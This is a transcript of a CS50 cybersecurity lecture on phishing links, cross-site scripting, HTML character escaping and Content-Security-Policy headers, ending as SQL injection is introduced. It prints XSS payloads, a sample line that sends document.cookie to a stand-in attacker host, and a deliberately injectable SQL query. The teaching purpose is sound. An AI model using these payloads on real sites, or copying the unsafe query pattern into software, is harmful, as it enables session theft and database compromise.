[MUSIC PLAYING]

DAVID J. MALAN: All right. This is CS50's Introduction to Cybersecurity. My name is David Malan. And this week, let's focus on securing software, whether it's the software you use or whether it's the software you write as a programmer.

Consider, for instance, one of our topics from earlier in the class, namely phishing, this attempt by an adversary to phish, or obtain, information from you. Let's consider today how you might go about implementing this kind of attack, and equivalently, how you, as the user, might go about noticing an attack like this.

Well, here, again, is a language called HTML, Hypertext Markup Language. And it's the language in which web pages are written. This is maybe the simplest example that we could put together that represents the kind of text that a web server would send to a web browser when it wants to display information on your screen, be it the day's news, your email inbox, or anything else that is web based. Dot, dot, dot is where I've put placeholders just to represent where some additional code might actually go, like the content of this actual web page.

Well, for instance, suppose that we consider in the abstract just a simple example of these so-called tags. And in fact, recall that everything that you just saw sort of had these open brackets, but also the same words again and again. For instance, if we wanted to have a paragraph in this language called HTML, we would have this thing here called a tag, or an open tag, or a start tag, and then this thing here at the end, an end tag or a close tag. And those are meant typically to be symmetric. This one begins a thought for the browser: hey, browser, here comes a paragraph. And this one here, with the forward slash inside of those angled brackets, means: hey, browser, that's it for the paragraph. So any time you see HTML in a file, it's really telling the browser what to start doing and what to stop doing. So here is how a browser, therefore, might know that it needs to display a paragraph of text, maybe separated by some whitespace from other paragraphs of text.
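As a rough sketch, the simplest page being described might look something like this, with the dot-dot-dots standing in for the title and the content (the markup on the actual slide may differ slightly):

    <!DOCTYPE html>
    <html>
        <head>
            <title>...</title>
        </head>
        <body>
            <p>...</p>
        </body>
    </html>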
Here, for instance, is how a browser might know that there's some code inside of the web page, typically written in a language called JavaScript. So this script tag opening here and this close script tag here would be: hey, browser, here's some code to execute. Dot, dot, dot. And hey, browser, that's it for the code to execute.

So how might there actually be a threat or an opportunity here for an adversary to phish information from you? Well, here, for instance, is how you might, in this language called HTML, create a link, otherwise known as a hyperlink, in a web page. And it, too, uses an open tag and a close tag. This a tag represents an anchor, that is, some hyperlink, some link in the web page right here. And this tag here means: OK, that's it for the link. And if we want a link, for instance, to Harvard's website, it's in between that open tag and close tag that you would actually put the text of what the link is meant to be. So if you want the user to see a link on the page that says Harvard, you would put literally Harvard between this open tag and close tag.

But that's not actually enough to link to some other page. You have to tell the browser what URL or what file you want clicking on Harvard to actually lead the user to. So for that, we need to introduce one other concept in this language called HTML, namely, an attribute. So href stands for hypertext reference. And it's a fancy way of saying, this is what I want the browser to link the user to when they click on that word, Harvard. Now, at the moment, I've just done a dot, dot, dot. But that would, for instance, be the URL of Harvard's own website.

So consider this very specific example now, whereby we still have our anchor tag opening here, we still have our anchor tag closing here. We now have, though, an href attribute that's telling the browser that when the word Harvard is clicked, I want the user to end up at https://harvard.edu. So that all seems fine and good. And this is the way the web is supposed to work. And this is what links in your own web pages will look like if you poke around underneath the hood. So where is the actual danger? Well, hopefully, there is none.
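Concretely, such a link would be written like this:

    <a href="https://harvard.edu">Harvard</a>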
And hopefully, when you open this kind of HTML in the context of a larger file with even more tags than just this anchor tag, you'd see a browser window that looks a little something like this. You'd see a link, typically underlined (though not necessarily), to Harvard. And then, and only then, if you hover over that link, can you see where you will go, even if you don't actually click the link. So suffice it to say, if you just click the link, you're going to end up on Harvard's own website. But if you, a little more cautiously, with a bit more paranoia, a bit more consciousness now of cybersecurity, hover over that link and focus on your browser's bottom left-hand corner typically, at least on a laptop or desktop, you'll actually see the URL to which you will actually be whisked away when you click on that link.

So this actually looks OK. The word here is Harvard. The URL it's going to link me to is https://harvard.edu. So I think all is well in the world. And indeed, you can do this on most any web page on your laptop and desktop if you want to proactively, preemptively see where it is you're going to go before you actually click on that link.

So where's the danger? Well, let's get a little more specific and a little more malicious, if I may. So here, we have the exact same HTML as before. But let's go ahead now and not just say Harvard inside of this open tag and close tag. Suppose that, for whatever reason, I want the user to see a little more obviously the URL to which they are going to be linked. So I may change Harvard, capital H, to harvard.edu, so the actual domain name that I want the user to be led to. Here is now what the user would see. So it's a little more obvious that it's harvard.edu and not some other Harvard website. And indeed, if we hover over that, we'll see that it still is going to the same URL. All right. So that seems fine. And not all that enlightening. Let's go one step further.
Suppose that you really want the user to see a URL in the body of the web page. So now I'm actually going to put, in between the open tag and the close tag, https://harvard.edu. Now, notice this looks a little redundant. And it is, in some sense, because I literally have the URL in two different places. But that's because those two values serve different purposes. The one in between the open tag and close tag is what the human sees. The one inside of the quote marks, the so-called value of the href attribute, is where the user will actually end up. So if you want them to be equivalent, you have to type the exact same thing twice in this case. So now, of course, if I go back to the web page, the human is now going to see literally this URL. And if they hover before clicking, they'll see confirmation as much.

So where are we going with this? Well, here is among the lessons of the course: to think about how you can take a perfectly reasonable technical solution to a problem, creating a link in a page in this case, and how an adversary might abuse it. How might you, as the end user, be vulnerable, in this case, to a so-called phishing attack? Well, there's nothing stopping me from putting anything I want in either this value or in this name of the link. So you know what? Why don't I be a little malicious here? And why don't I tell the user that they're going to harvard.edu, but they're actually going to yale.edu instead, another school down the road?

So what does the human see now? If we go back to the browser, they still see what appears to be https://harvard.edu. But if they hover over it, and only if they hover over it, will they see this little clue that, uh-uh, you're actually going to be whisked away to yale.edu. And if they click on the link, they'll actually find themselves at the actual yale.edu website.

So what's the big deal? Well, this might just be a silly prank, in which case, it's probably inconsequential. And if you do link from one website to a completely different one, it's not necessarily a phishing attack.
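Concretely, the deceptive link being described looks something like this, where the text the user sees is one URL but the href attribute points somewhere else entirely:

    <a href="https://yale.edu">https://harvard.edu</a>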
It might be confusing because the user thinks they're going to Harvard, but they find themselves at Yale. But there's not necessarily any danger in that mislead. But what if the adversary in this case doesn't link to a very common, popular website like yale.edu, but maybe a website like harvard.edu where just one of the characters is slightly misspelled, as we've discussed in the past, such that you and I, unless we really, really look carefully, might not even notice that we're not at the real harvard.edu? And what if, further, the adversary went through the trouble of copying all of the HTML that implements Harvard's website and pasted it into their own fake version of Harvard's website that lives at, again, a URL that is almost the same? Here is now where there's a phishing opportunity. Because if you think you're going to harvard.edu, and you click the link, and it looks like you're at harvard.edu, and you don't notice a subtlety like, wait a minute, that's not quite the right URL, you might now be inclined to, and comfortable with, maybe logging in to the fake "harvard.edu" website with your username and your password. And voila, now the adversary has that information from you.

And it doesn't have to be Harvard. It doesn't have to be Yale. It might be your bank. It might be paypal.com or something where you could actually lose money or some other asset you care about. And so that's really the essence of the implementation details of a phishing attack, at least in the context of web pages and/or emails. It all boils down to these primitives of HTML being the language in which web pages are written. And adversaries, by knowing HTML, also now logically can misuse HTML by understanding how these basics work.

So let me pause here and see if there's any questions about phishing, or HTML, or this convergence of the two when it comes to this form of social engineering, as we called it before.

AUDIENCE: Would it be possible to use an IP address or some other means to get to their website, and not the URL?

DAVID J. MALAN: Short answer, yes.
If you have access to dedicated IP addresses, which are these unique identifiers you can use for servers on the internet, you can absolutely have a URL that is http:// and then the IP address. Now, typically, it would be HTTP and not HTTPS when using an IP address, in which case, that might be a clue to the user that, wait a minute, this is making me nervous that this isn't legitimate. But honestly, I think we can all think of people in our lives who wouldn't have the instincts to notice, wait a minute, what is this weird numeric address in my browser bar, and stop what they're doing. That's, indeed, among the goals of a class like this: to give you those instincts and that training to be a little suspicious when you see something like a raw IP address in the browser. Technically, there's nothing wrong with it. But it's a little bit of a weird branding or marketing decision for a website.

And I think a corollary of this, then, logically, is that if you are running a website of your own, or if you're running a business with a website of your own, you should really avoid using many different URL formats, or many different domains, or having any sort of curiosities or weirdnesses in your domain names, because you're really just teaching users implicitly that your URL format might change from time to time. And certainly, you never want to use just an IP address, because you're going to train people to expect that. And so standardizing on one or very few domain names or subdomains is generally best for that.

So what are some other attacks that we should be mindful of when it comes to our own software? Well, a class of attacks, or a category of attacks, is generally known as code injection, which is an opportunity for an adversary to somehow inject code into your software and often trick your software into executing that code, even if you, yourself, didn't write it. Well, let's consider one example of this. A common attack on the web in particular is what's known as cross-site scripting, or XSS for short.
Cross-site scripting refers to this potential opportunity for an adversary to trick one website into executing code that they, again, themselves did not write. So what form might this actually take? Well, suppose that you, yourself, visit google.com, and suppose that Google isn't aware of this particular attack. They certainly are nowadays. But suppose that they weren't yet aware that this attack exists. And so when someone like you or I goes to google.com and searches for something like cats, suppose they do the following. They show you a whole page of search results. And I won't bother showing the actual results. But as of today, there were 6,420,000,000 cats on the internet that Google knows about. And they would show up, of course, down here.

Now, notice a few characteristics about google.com as it typically behaves. Well, one, you still see a text box containing what it is you searched for, so that you can change it, or at least see what it is. And notice, too, that in smaller text here, in this particular version of Google, it tells you not only how many results there are, but specifically, how many cats there are. So that is to say, if Google is using your own input not only to remind you of what you searched for in the search box, but also in the body of the web page, that very simple idea is vulnerable to an attack. Why? Because who wrote the word, cats, C-A-T-S? Well, it wasn't Google, per se. It was me.

Now, fortunately, cats, in and of itself, is not dangerous. But suppose I knew a little something about HTML, and browsers, and how the internet works, and suppose that I, now an adversary, did something like this. Knowing that Google is probably, inside of their web page, rendering HTML that looks like this, a paragraph of text per the open paragraph and close paragraph tag, and an English sentence like this, about 6,420,000,000 cats, if I know they're putting my input, cats, into HTML that looks like this, let me see if I can try to trick Google into outputting something that they might not have anticipated.
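The markup Google is presumably generating for that sentence would be roughly:

    <p>About 6,420,000,000 cats</p>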
So instead of cats, let me type something a little weird that looks like this. Now, what are we looking at? We're looking at now an HTML tag, the script tag, both opened and closed here, and a little bit of code in a language called JavaScript. Now, thankfully, this, in and of itself, is not actually a compelling attack. It's literally just going to display "attack," quote, unquote, on the screen. So it's just meant to be representative, I claim, of how I could potentially trick a website like Google into executing code that I wrote, not that they wrote.

So what do I mean by that? Notice that I've got this open script tag here and the close script tag here, which means everything in between there is script, that is, JavaScript, this particular language. Well, it turns out this particular language, in the context of browsers, comes with a function, a feature, known as alert. And if you want to alert the user with some message, you literally write the word alert and then an open parenthesis and a close parenthesis on the left and right. And then, inside of single quotes or double quotes, you put whatever word or words you want to alert the user to. So this is often used for displaying messages to the user, not actual attacks, but useful messages. And there's more elegant ways to do this as well. But this is the simplest representation of an attack that I could propose here.

Now, I haven't yet hit Enter on this page because, indeed, we still see that we're on the page relating to cats as my search result. But as soon as I hit Enter after searching for this string of JavaScript code, or really, HTML inside of which is JavaScript code, what might happen? Well, this could potentially happen. Now, again, this is not a bad thing in this specific case. It's just throwing up an alert to the user. And in this sense, too, I'm really only attacking myself, because if I'm the adversary, and this is my browser, and I've just tricked Google into executing some JavaScript code such that a pop-up appears saying attack, well, I'm just hacking myself. So this is inconsequential.
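Concretely, the input being typed into the search box is this:

    <script>alert('attack')</script>

And a vulnerable server might then echo it right back inside its results page, something like:

    <p>About 6,420,000,000 <script>alert('attack')</script></p>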
But again, it's representative of how we could potentially trick a website into executing code that they did not intend. Now, why is this displaying? Well, notice: no more cats, and no input here that I typed myself. Last time, when I searched for cats, I saw the word cats here. But now I'm seeing nothing at all. Now, why is that? Well, underneath the hood, previously, I claimed that Google was probably rendering HTML like this: a paragraph of text, open tag, close tag, and then the sentence about 6,420,000,000 cats, so HTML. And they were just plugging in whatever I, the human, typed in.

Well, this time, I conjecture that if I typed in what looks like, and is, HTML with a bit of scary JavaScript code in between, what Google is probably going to try to output in the body of the web page they send to my browser is this: an open paragraph tag and a close paragraph tag, still the beginning of a sentence, assuming that there are this many attacks in the world, 6,420,000,000. But notice this. Because I, the user, literally typed in the script tag, and the close script tag, and then that JavaScript code in between, the browser doesn't know that that came from me and not Google. So the browser is just going to read this as: hey, browser, start a paragraph, about 6,420,000,000. Hey, browser, here comes a script, that is, a program that you should execute. What do I execute? Alert, quote, unquote, "attack." Hey, browser, that's it for the script. Hey, browser, that's it for the paragraph.

So if Google is just blindly copying and pasting what I, the human, am typing in, I might trick Google into rendering HTML that Google did not intend. And the side effect in this case is that I see this alert. But really, that's indicative of a potential exploit in Google's website if they were not detecting this on their own. So this is the code that's dangerous. And what, then, is the fundamental problem? They are just literally outputting what I, the adversary, typed in to their page. So how do we go about mitigating something like this to avoid this kind of attack?
Well, let's first propose what we want the effect to be: something a little more like this. Assuming, again, that there are 6,420,000,000 attacks in the world, what I want to see is literally that English sentence here. I don't want any sort of pop-up. So this, I would propose, is the correct behavior, assuming we see more search results down below. I have searched for this. Google is telling me, or reminding me, what I searched for, but there's no pop-ups in this case. So somehow or other, based on this screenshot alone, there must be a way of ensuring on Google's end that even if the human types in HTML with, perhaps, some JavaScript code in the middle, they don't actually treat it as HTML and JavaScript code in the middle. They just display it literally, character by character, whatever I, the user, typed in.

So what is our concern with this particular symptom? Well, it turns out that an adversary can wage what we would call a reflected attack, whereby we could leverage this symptom in such a way that maybe we could construct a URL that, if clicked by a user, actually triggers this kind of behavior, but moreover, doesn't just trigger this fairly innocuous behavior, like alerting the user with a message like attack just to scare them. But what if we wrote even more malicious JavaScript code that maybe steals their cookies or does something more than that?

Well, how do you wage what's called here a reflected attack? Well, let's first consider what a basic link in a web page or an email looks like. It's, again, an anchor tag that starts and ends. It has an href attribute that represents the URL or file to which we're going to link the user, and then some text that the human will actually see in the web page. And now let's notice, when we correctly search for cats, as we did before, that not only do we see cats in the text box here, not only do we see cats in the body of the web page, but notice now the URL. It turns out, when you search for something on Google, you end up at a URL that looks essentially like this. It might actually be a little longer.
But a lot of those parameters, so to speak, in the URL aren't strictly necessary. So this is the shortest possible URL that will work on Google if you want to search for cats. And notice what it is: https://www.google.com/search?q=cats. So this is to say that the way Google works is that if you want to search for cats, you simply visit a URL that looks like this. If you want to search for dogs, you visit a URL that looks almost like this, but instead has q=dogs, which is to say there's just a very standard format on google.com, and a lot of other websites too, for searching for things, or really, sending input to a web server. And this web form, or this text box, that you typically use to type in cats, or dogs, or anything else is just generating a URL that looks like this. And then Google knows what to do with it.

So how can we leverage that reality now a little more maliciously? Well, let's go back to our HTML. And let's again assume that the adversary is trying to construct some HTML for their own email or for their own website in order to attack some unsuspecting users. Well, instead of the dot, dot, dots, let's be more specific. Let's actually, in a good way, in an honest way, say that we're going to let the user click on the word cats, which is in between my open tag and close tag. And if they click on that, they're going to end up at the legitimate Google website, https://www.google.com/search?q=cats. So this is correct. This is not yet an attack.

But what if I am a little malicious? And instead of using the legitimate URL there for searching for cats, suppose I construct something a little more cleverly that says we're going to show them cats, but actually, we're going to bring them to this URL. Now, this is a bit of a mouthful. And in fact, it wraps onto two lines this time. But notice the URL starts the same, https://www.google.com/search?q=, and then some weird text, %3Cscript%3Ealert, wrapping onto the other line, and so forth. So I dare say you're seeing some familiar phrases now, script and alert, but there's also some weird syntax there as well.
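Assembled into a link, the attack being described might look something like this (shown on one line here, with the angle brackets, slash, and quotes percent-encoded):

    <a href="https://www.google.com/search?q=%3Cscript%3Ealert(%27attack%27)%3C%2Fscript%3E">cats</a>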
Now, that weird syntax is just a representation of URL escaping. It turns out that certain characters in URLs, like angled brackets and other syntax, are not good to include in URLs, because they might be mistaken by the browser for something else. And so URLs typically escape punctuation symbols and other characters using this percent syntax. Now, it looks a little weird to the user, but what's more worrisome is what this is going to be used for on Google's end. If the q value equals this whole bunch of text, and it's just the browser that's encoding those special characters in this way, what Google's really going to see on its end is the actual script tag, with the actual alert, and the actual close script tag that you and I constructed earlier. That is to say, what Google's going to receive from that URL is no longer "cats," quote, unquote, but this, quote, unquote, because the server is going to automatically convert the percent signs and those weird characters back to the original. That's how URL encoding works. So what the server is going to receive is this.

And again, if the server is vulnerable to naively just outputting literally whatever the human typed in, the risk is that they're going to now execute that code. And what if the code isn't just an alert? Maybe it's something like this, which still isn't, in and of itself, a bad thing, because it's just an alert. But this is actually some JavaScript code now, alert(document.cookie), that would actually throw up a dialog window that shows the user the value of the cookies they have there on Google's website. OK, not such a big deal. It's not all that different from just saying, quote, unquote, "attack." But what this means is that in JavaScript, you have access to all of the cookies for a website, at least, those that are made available to JavaScript.
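By way of a hypothetical sketch, an injected payload could do more than alert; a line like the following would quietly ship the page's cookies off to a server the attacker controls (attacker.example is an invented domain for illustration):

    <script>
        // Hypothetical exfiltration: smuggle the cookies out via an image request
        new Image().src = 'https://attacker.example/steal?c=' + encodeURIComponent(document.cookie);
    </script>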
And if an adversary doesn't use the alert function, but maybe uses a little more code to send the value of document.cookie to their own website, or to somehow send other information from the web page, the user's username or any other personally identifying information, suffice it to say that by being able to write code in JavaScript, and by being able to trick a server like Google in this story into executing that code, you can effectively, by transitivity, trick a user's browser into executing that code for you. So the adversary is sending the code into Google, and it's being reflected back to some user if they click that same link in an email or a website. And at this point, things like their own cookies might be vulnerable. And again, to be clear, this, in and of itself, should not hurt you. I'm just using alert as demonstrative of what could be possible. But you could do any number of other things with document.cookie or other values from a web page as soon as you have this ability to write JavaScript that's reflected back into someone else's browser.

Any questions, then, on this particular attack?

AUDIENCE: I just wanted to ask a question about JavaScript blocking, because many of the browsers [INAUDIBLE] use to block JavaScript. How can you use websites in a browser which blocks JavaScript without getting tricked by the JavaScript?

DAVID J. MALAN: That's a really good question. And the short answer is that nowadays, that's not really the best technique, to just block JavaScript. The reality is, at this point in time, so many websites, most websites, dare I say, use, if not rely on, JavaScript to do any number of features or render their own content. And so it's just, I think, not realistic to just disable JavaScript in order to protect yourself from these kinds of attacks. In a bit, we'll discuss ways to mitigate this kind of attack, where you disable some JavaScript, but not all. But in general, I don't think that's a realistic solution, at least on most websites nowadays.

So how else might these same principles be misused?
Well, it turns out there's another class of attacks known as stored attacks, whereby the adversary's input isn't just immediately reflected back from the server to some unsuspecting user, as it might be when you're using the URL to contain the code. But suppose that a website were vulnerable to actually storing the user's input, even if the user's input includes HTML with some JavaScript inside. Well, that would be a stored attack. And it might work as follows. At the risk of picking on Google, suppose that, when using Gmail, you sent someone an email with that exact same code, whereby you're just alerting, quote, unquote, "attack." Again, that, in and of itself, isn't going to hurt anyone. But it's representative of what you could do with code.

Now, presumably, when you send an email in Gmail, or Outlook, or any other service, that email is going to be stored on a server until it's read and until it's deleted, perhaps, by the user. And if it's never deleted, it's going to stay stored on the server. So this type of attack assumes that the server might actually be saving the user's input in a database or a file somewhere. Now, suppose that here, too, Google didn't know about these kinds of cross-site scripting attacks, and they just allow you and me to input HTML and JavaScript into an email, and they just blindly save it into their database. And then, when the recipient opens this email, they just show the recipient the contents of that email.

Well, what could go wrong? Well, if the recipient opens that particular email, and Google is literally rendering the script tag with the JavaScript inside, the recipient of that email, when they open their inbox, may very well suffer some kind of an attack. Again, it just says attack on the screen. But it represents being tricked into running code that someone else wrote, and in this case, someone else sent you. Ideally, what we would want to have happen instead is not have Google show us the attack message here. But rather, I would like my inbox to show me the code I was sent, but not execute it.
That is, just like I wanted to know that there are 6,420,000,000 cats among the search results, so would I want Gmail to just show me what it is the adversary typed in, without actually interpreting it or executing it as HTML with some JavaScript inside. So that could be a stored attack, and would be a stored attack if, thankfully, Google weren't actually protecting us against this, which they are.

So how do you go about preventing an attack like this in software? Well, the general answer is character escapes. That is, taking any characters in the user's input that might potentially be misinterpreted at best, or, at worst, might be dangerous to the users, and escaping them. Now, what characters might be worrisome? Well, in something like HTML, anything with an angled bracket, a less than sign, would probably potentially be mistaken for the beginning of an HTML tag. So I dare say that a less than sign is a dangerous character. Similarly might a greater than sign represent the end of a tag. So that, too, might be something to give us concern. And there's probably a few other characters as well.

So what should servers be doing? What should software be doing to avoid these kinds of cross-site scripting attacks, whether reflected or stored? Well, ideally, something like this would not just be blindly outputted by Google, but rather, it would be escaped in this very weird-looking way. But let me highlight just a subset of these characters. Highlighted in yellow now are only the character escapes to which I'm referring. It turns out that this language, HTML, has standardized some special sequences of characters that represent the less than sign, that represent the greater than sign. They're a little more verbose to type. You have to type out four characters in this particular case. But browsers are designed to know that when they see &lt;, they should not show &lt; itself on the screen. They should show a less than sign. And similarly, when browsers see &gt;, they should display not literally that, but a greater than sign.
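Concretely, the safely escaped output being described would look something like this in the page's source, which the browser then displays as text rather than executes:

    <p>About 6,420,000,000 &lt;script&gt;alert('attack')&lt;/script&gt;</p>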
So this is to say, if Google were smart, they would take any user input you and I give them, but they would make sure to escape any potentially dangerous characters with these kinds of escape sequences, so to speak. And Google's got to look it up in a book, or on a website, or in the specification to know what escape they should use. But these are very well documented and standardized. And indeed, we have one here and here for the open script tag, and then another here and here for the close script tag. But notice, we don't have to escape all of the punctuation, like the slash, or the English letters in the tag name, or the like. We're only escaping a certain list of these characters.

Well, what is that list? Here are the five that, minimally, we should generally be escaping, depending on the context. The less than sign should become &lt;, and the greater than sign, &gt;. Then the ampersand, for the very reason that we're now potentially creating a new problem: if we're using ampersands all over the place, what if the user's input has an ampersand? We don't want to confuse the ampersand in the user's input for a character escape. So there actually needs to be a more verbose way, &amp;, to represent literally an ampersand. Then there's one for a double quote, &quot;, and one for a single quote or apostrophe, &#39;. And there's more as well. But generally, these are the five that could otherwise get you in trouble.

So all of the examples we've seen thus far, where Google is somehow reflecting back or storing potential attack code, will not happen if Google is just smart, whereby they're escaping that input from a user before sending it back out as output to google.com search results or to Gmail inboxes.

So how else might we actually prevent attacks like these? Well, we can also put in place other measures as well. And recall from past classes we discussed this notion of HTTP headers. An HTTP header is a line of text that's stored in those virtual envelopes that get sent from browsers to servers and from servers to browsers. Inside of the envelope typically is the actual request for a web page, or the actual contents of the response for a web page.
But also in those envelopes is additional information, namely, these HTTP headers, which are key-value pairs that provide additional instructions, if you will, to the browser or server. So, for instance, suppose that we want to ensure that this kind of reflected or stored attack isn't possible, whereby we're accidentally embedding script tags in our own website's HTML. Well, suppose that the website in question now isn't google.com specifically, but, more generally, example.com. And suppose that example.com's web server is configured to always output, in those virtual envelopes, an HTTP header that is Content-Security-Policy:. So that string of text is the key. And the value of that key is script-src and then the URL that we want to allow scripts from only.

So what does this mean? Albeit fairly cryptic, if you configure a web server with this HTTP header, this will ensure that you can only load JavaScript code from actual files, typically ending in .js, that are sent separately from the server to the browser. This line of an HTTP header prevents inline scripts, so to speak. Whereas by default a browser will execute any old script tag in the web page, this prevents that default behavior. So as such, even if Google, even if example.com, messes up and forgets to use character escapes when rendering user input that came from a URL, or came from an email, or any other source, this header should at least tell the browser, at least newer browsers, uh-uh. Even if you accidentally see a script tag with some JavaScript inside of it in my web page, don't execute it. Only allow me to execute JavaScript code that came from a separate file.

The only type of JavaScript that will now be allowed is if I have a tag that looks like this in my HTML, which is an alternative version of the script tag. But instead of embedding any code inside of the open tag and the close tag itself, it refers to the source of, abbreviated src, some file, typically, again, ending in .js.
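As a sketch, the header and the kind of external script tag being described might look like this (example.com is the stand-in domain from the lecture, and app.js is just a placeholder file name):

    Content-Security-Policy: script-src https://example.com/

    <script src="https://example.com/app.js"></script>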
668 00:35:38,800 --> 00:35:43,180 So if this dot, dot, dot were the URL of a file that 669 00:35:43,180 --> 00:35:46,660 contains JavaScript code, that would be allowed because the presumption 670 00:35:46,660 --> 00:35:49,690 there is that if someone went through the trouble of creating 671 00:35:49,690 --> 00:35:53,980 that file on our own server, example.com, presumably, 672 00:35:53,980 --> 00:35:55,000 that code is safe. 673 00:35:55,000 --> 00:35:58,000 But what this line in our header does is it 674 00:35:58,000 --> 00:36:01,960 ensures that we can only execute JavaScript code if it comes 675 00:36:01,960 --> 00:36:04,540 from example.com in a separate file. 676 00:36:04,540 --> 00:36:07,960 Even when we use an HTML tag like this, that HTTP header will still prohibit 677 00:36:07,960 --> 00:36:12,400 any script tags that are inlined 678 00:36:12,400 --> 00:36:15,790 in the body of our actual web pages. 679 00:36:15,790 --> 00:36:16,970 What else can we do? 680 00:36:16,970 --> 00:36:19,300 Well, it turns out-- and we haven't talked about it in this class-- 681 00:36:19,300 --> 00:36:22,175 there are other languages that you can use in the context of web pages, 682 00:36:22,175 --> 00:36:25,090 not only HTML, not only JavaScript, but also a language 683 00:36:25,090 --> 00:36:27,670 called CSS, or Cascading Style Sheets, which 684 00:36:27,670 --> 00:36:29,650 is generally used to style your page. 685 00:36:29,650 --> 00:36:33,070 If you're familiar, or if you take a course on web development, 686 00:36:33,070 --> 00:36:35,920 know that there's similarly a mechanism whereby 687 00:36:35,920 --> 00:36:41,410 you can specify that only CSS from a specific server like example.com 688 00:36:41,410 --> 00:36:45,370 should be allowed, and not inline style tags, 689 00:36:45,370 --> 00:36:47,450 with which you might be familiar as well. 690 00:36:47,450 --> 00:36:52,270 So here instead of script source, we see style source, which is just another way 691 00:36:52,270 --> 00:36:57,610 of using this HTTP header mechanism to just ensure that the browser, at least, 692 00:36:57,610 --> 00:37:00,880 if it's new enough, will not blindly execute script 693 00:37:00,880 --> 00:37:05,110 tags in the first case or style tags in the second case when 694 00:37:05,110 --> 00:37:06,850 these kinds of headers are present. 695 00:37:06,850 --> 00:37:10,210 It's an additional layer of defense against these kinds 696 00:37:10,210 --> 00:37:12,580 of reflected or stored attacks. 697 00:37:12,580 --> 00:37:15,490 Indeed, that particular HTTP header would only 698 00:37:15,490 --> 00:37:18,790 allow us to include CSS in our web page if it 699 00:37:18,790 --> 00:37:22,240 uses a tag like this, namely, a link tag with an href value. 700 00:37:22,240 --> 00:37:26,950 The dot, dot, dot in this case would be the URL of a CSS file 701 00:37:26,950 --> 00:37:30,490 on the particular server, example.com, and the relationship 702 00:37:30,490 --> 00:37:35,170 of that file to the page is that of this thing called a style sheet. 703 00:37:35,170 --> 00:37:38,680 Questions, then, on this use of HTTP headers 704 00:37:38,680 --> 00:37:42,910 to prevent these kinds of stored or reflected attacks or anything 705 00:37:42,910 --> 00:37:44,200 else thus far? 706 00:37:44,200 --> 00:37:48,463 AUDIENCE: What do the backslash P and backslash A [INAUDIBLE] sequence do? 707 00:37:48,463 --> 00:37:49,630 DAVID J. MALAN: Backslash P? 708 00:37:49,630 --> 00:37:52,000 Oh, in the HTML.
709 00:37:52,000 --> 00:37:58,060 So recall that a lot of our tags have open tags and close tags and the slash. 710 00:37:58,060 --> 00:38:00,160 It's actually a forward, not a backslash. 711 00:38:00,160 --> 00:38:04,310 The forward here just finishes the thought for the browser. 712 00:38:04,310 --> 00:38:05,620 So this starts the tag. 713 00:38:05,620 --> 00:38:06,940 This ends the tag. 714 00:38:06,940 --> 00:38:11,650 And you use the same word, script in this case, script in this case or A, 715 00:38:11,650 --> 00:38:13,450 or P, as you described. 716 00:38:13,450 --> 00:38:18,470 That is what closes or ends the tag in question, 717 00:38:18,470 --> 00:38:23,070 so that you know where the tag ends or where the paragraph ends. 718 00:38:23,070 --> 00:38:24,870 Other questions? 719 00:38:24,870 --> 00:38:27,480 AUDIENCE: Pertaining that React framework, as far 720 00:38:27,480 --> 00:38:32,460 as I understand [INAUDIBLE] format, you use interchangeably 721 00:38:32,460 --> 00:38:36,720 both JavaScript and HTML, how that isn't a security 722 00:38:36,720 --> 00:38:39,672 risk for these kind of attacks? 723 00:38:39,672 --> 00:38:41,880 DAVID J. MALAN: Really good question beyond the scope 724 00:38:41,880 --> 00:38:44,830 of this class for those who don't have a programming background. 725 00:38:44,830 --> 00:38:48,450 However, yes, React and other frameworks use a technique 726 00:38:48,450 --> 00:38:51,690 called JSX, which combines JavaScript with HTML 727 00:38:51,690 --> 00:38:54,270 with CSS that are rendered by the browser. 728 00:38:54,270 --> 00:38:57,270 In that case, though, Mateo, the browser is 729 00:38:57,270 --> 00:39:01,230 running JavaScript code that comes from the React library that 730 00:39:01,230 --> 00:39:05,760 is reading as input that JSX code and converting it 731 00:39:05,760 --> 00:39:10,690 to the resulting code that should be executed within the browser. 732 00:39:10,690 --> 00:39:16,440 So long as all of that code comes from .js files, or .css files, or the like, 733 00:39:16,440 --> 00:39:17,380 all is well. 734 00:39:17,380 --> 00:39:20,640 But if you just inline it and you're outputting headers like this, 735 00:39:20,640 --> 00:39:22,180 it won't execute at all. 736 00:39:22,180 --> 00:39:23,650 So the same rules apply. 737 00:39:23,650 --> 00:39:26,240 You would have to use an external file. 738 00:39:26,240 --> 00:39:29,470 So when it comes to code injection, there are other types of attacks, 739 00:39:29,470 --> 00:39:32,140 particularly, in the context of what's called SQL, 740 00:39:32,140 --> 00:39:35,350 or Structured Query Language, which is a language that's typically used 741 00:39:35,350 --> 00:39:37,940 with databases, so again, on a server. 742 00:39:37,940 --> 00:39:41,380 So let's consider how you might also trick software 743 00:39:41,380 --> 00:39:44,830 into executing SQL code, that is, code written 744 00:39:44,830 --> 00:39:48,280 in this particular language, when it comes to databases specifically. 745 00:39:48,280 --> 00:39:51,790 Well, here, for instance, is some representative code in this language 746 00:39:51,790 --> 00:39:56,680 called SQL, whereby, you have a line like SELECT * FROM users WHERE 747 00:39:56,680 --> 00:40:00,940 username= quote, unquote and then username in curly braces. 
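In real code, that pattern might look roughly like the following hypothetical Python sketch, where the query text is pieced together with an f-string; the database handle, table, and column names are made up for illustration:

    def find_user_unsafe(db, username):
        # DANGEROUS: the user's input is pasted directly into the SQL text,
        # so whatever they type becomes part of the command itself.
        query = f"SELECT * FROM users WHERE username = '{username}'"
        return db.execute(query)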
